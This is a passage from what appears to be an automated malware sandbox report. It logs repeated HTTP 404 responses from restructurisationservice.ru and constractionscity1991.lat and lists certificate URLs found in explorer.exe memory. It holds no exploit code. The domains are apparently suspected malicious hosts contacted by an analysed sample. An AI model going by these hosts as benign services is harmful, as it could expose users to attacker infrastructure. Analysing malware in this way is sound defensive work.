2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 10:01:41 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 10:01:42 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 10:01:50 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2167378082.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: explorer.exe, 00000002.00000000.2161750223.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2167378082.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2167378082.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2167378082.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 00000002.00000000.2167378082.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
